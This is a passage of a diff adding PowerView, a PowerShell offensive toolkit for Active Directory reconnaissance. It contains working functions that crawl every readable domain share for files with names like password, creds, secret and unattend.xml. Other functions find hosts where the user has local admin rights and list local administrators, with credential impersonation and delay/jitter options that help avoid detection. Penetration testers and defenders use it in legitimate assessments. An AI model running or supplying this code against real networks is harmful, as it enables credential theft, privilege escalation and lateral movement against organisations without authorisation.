+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Find-InterestingDomainShareFile { +<# +.SYNOPSIS + +Searches for files matching specific criteria on readable shares +in the domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. It will then use Find-InterestingFile on each +readhable share, searching for files marching specific criteria. If -Credential +is passed, then Invoke-UserImpersonation is used to impersonate the specified +user before enumeration, reverting after with Invoke-RevertToSelf. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. 
+ +.PARAMETER Include + +Only return files/folders that match the specified array of strings, +i.e. @(*.doc*, *.xls*, *.ppt*) + +.PARAMETER SharePath + +Specifies one or more specific share paths to search, in the form \\COMPUTER\Share + +.PARAMETER ExcludedShares + +Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$. + +.PARAMETER LastAccessTime + +Only return files with a LastAccessTime greater than this date value. + +.PARAMETER LastWriteTime + +Only return files with a LastWriteTime greater than this date value. + +.PARAMETER CreationTime + +Only return files with a CreationTime greater than this date value. + +.PARAMETER OfficeDocs + +Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) + +.PARAMETER FreshEXEs + +Switch. Find .EXEs accessed within the last 7 days. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-InterestingDomainShareFile + +Finds 'interesting' files on the current domain. 
+ +.EXAMPLE + +Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local') + +Finds 'interesting' files on readable shares on the specified systems. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches interesting files in the testlab.local domain using the specified alternate credentials. + +.OUTPUTS + +PowerView.FoundFile +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FoundFile')] + [CmdletBinding(DefaultParameterSetName = 'FileSpecification')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [Alias('SearchTerms', 'Terms')] + [String[]] + $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), + + [ValidateNotNullOrEmpty()] + [ValidatePattern('\\\\')] + [Alias('Share')] + [String[]] + $SharePath, + + [String[]] + $ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'), + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastAccessTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + 
[ValidateNotNullOrEmpty()] + [DateTime] + $LastWriteTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $CreationTime, + + [Parameter(ParameterSetName = 'OfficeDocs')] + [Switch] + $OfficeDocs, + + [Parameter(ParameterSetName = 'FreshEXEs')] + [Switch] + $FreshEXEs, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize 
} + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-InterestingDomainShareFile] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + + $SearchShares = @() + if ($TargetComputer.StartsWith('\\')) { + # if a share is passed as the server + $SearchShares += $TargetComputer + } + else { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # get the shares for this host and display what we find + $Shares = Get-NetShare -ComputerName $TargetComputer + ForEach ($Share in $Shares) { + $ShareName = $Share.Name + $Path = '\\'+$TargetComputer+'\'+$ShareName + # make sure we get a real share name back + if (($ShareName) -and ($ShareName.Trim() -ne '')) { + # skip this share if it's in the exclude list + if ($ExcludedShares -NotContains $ShareName) { + # check if the user has access to this path + try { + $Null = 
[IO.Directory]::GetFiles($Path) + $SearchShares += $Path + } + catch { + Write-Verbose "[!] No access to $Path" + } + } + } + } + } + } + + ForEach ($Share in $SearchShares) { + Write-Verbose "Searching share: $Share" + $SearchArgs = @{ + 'Path' = $Share + 'Include' = $Include + } + if ($OfficeDocs) { + $SearchArgs['OfficeDocs'] = $OfficeDocs + } + if ($FreshEXEs) { + $SearchArgs['FreshEXEs'] = $FreshEXEs + } + if ($LastAccessTime) { + $SearchArgs['LastAccessTime'] = $LastAccessTime + } + if ($LastWriteTime) { + $SearchArgs['LastWriteTime'] = $LastWriteTime + } + if ($CreationTime) { + $SearchArgs['CreationTime'] = $CreationTime + } + if ($CheckWriteAccess) { + $SearchArgs['CheckWriteAccess'] = $CheckWriteAccess + } + Find-InterestingFile @SearchArgs + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, 
$LogonToken + } + } + else { + Write-Verbose "[Find-InterestingDomainShareFile] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'Include' = $Include + 'ExcludedShares' = $ExcludedShares + 'OfficeDocs' = $OfficeDocs + 'ExcludeHidden' = $ExcludeHidden + 'FreshEXEs' = $FreshEXEs + 'CheckWriteAccess' = $CheckWriteAccess + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Find-LocalAdminAccess { +<# +.SYNOPSIS + +Finds machines on the local domain where the current user has local administrator access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and for each computer it checks if the current user +has local administrator access using Test-AdminAccess. If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +Idea adapted from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" ' + 'Thomas McCarthy "smilingraccoon" ' + 'Royce Davis "r3dy" ' + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. 
+ +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER CheckShareAccess + +Switch. Only display found shares that the local user has access to. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-LocalAdminAccess + +Finds machines in the current domain the current user has admin access to. 
+ +.EXAMPLE + +Find-LocalAdminAccess -Domain dev.testlab.local + +Finds machines in the dev.testlab.local domain the current user has admin access to. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-LocalAdminAccess -Domain testlab.local -Credential $Cred + +Finds machines in the testlab.local domain that the user with the specified -Credential +has admin access to. + +.OUTPUTS + +String + +Computer dnshostnames the current user has administrative access to. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Switch] + $CheckShareAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 
+ ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-LocalAdminAccess] No hosts found to enumerate' + } + + # the host enumeration block we're using to 
enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # check if the current user has local admin access to this server + $Access = Test-AdminAccess -ComputerName $TargetComputer + if ($Access.IsAdmin) { + $TargetComputer + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken + } + } + else { + Write-Verbose "[Find-LocalAdminAccess] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with 
New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + + +function Find-DomainLocalGroupMember { +<# +.SYNOPSIS + +Enumerates the members of specified local group (default administrators) +for all the targeted machines on the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the members of the specified local +group (default of Administrators) for each machine using Get-NetLocalGroupMember. +By default, the API method is used, but this can be modified with '-Method winnt' +to use the WinNT service provider. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER GroupName + +The local group name to query for users. 
If not given, it defaults to "Administrators". + +.PARAMETER Method + +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainLocalGroupMember + +Enumerates the local group memberships for all reachable machines in the current domain. + +.EXAMPLE + +Find-DomainLocalGroupMember -Domain dev.testlab.local + +Enumerates the local group memberships for all reachable machines the dev.testlab.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred + +Enumerates the local group memberships for all reachable machines the dev.testlab.local +domain using the alternate credentials. + +.OUTPUTS + +PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. 
+ +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroupMember.API')] + [OutputType('PowerView.LocalGroupMember.WinNT')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $GroupName = 'Administrators', + + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if 
($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainLocalGroupMember] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $GroupName, $Method, $TokenHandle) + + # Add check if user defaults to/selects "Administrators" + if 
($GroupName -eq "Administrators") { + $AdminSecurityIdentifier = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null) + $GroupName = ($AdminSecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value -split "\\")[-1] + } + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $NetLocalGroupMemberArguments = @{ + 'ComputerName' = $TargetComputer + 'Method' = $Method + 'GroupName' = $GroupName + } + Get-NetLocalGroupMember @NetLocalGroupMemberArguments + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken + } + } + else { + 
Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'GroupName' = $GroupName + 'Method' = $Method + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +######################################################## +# +# Domain trust functions below. +# +######################################################## + +function Get-DomainTrust { +<# +.SYNOPSIS + +Return all domain trusts for the current domain or a specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current (or a remote) +domain using a 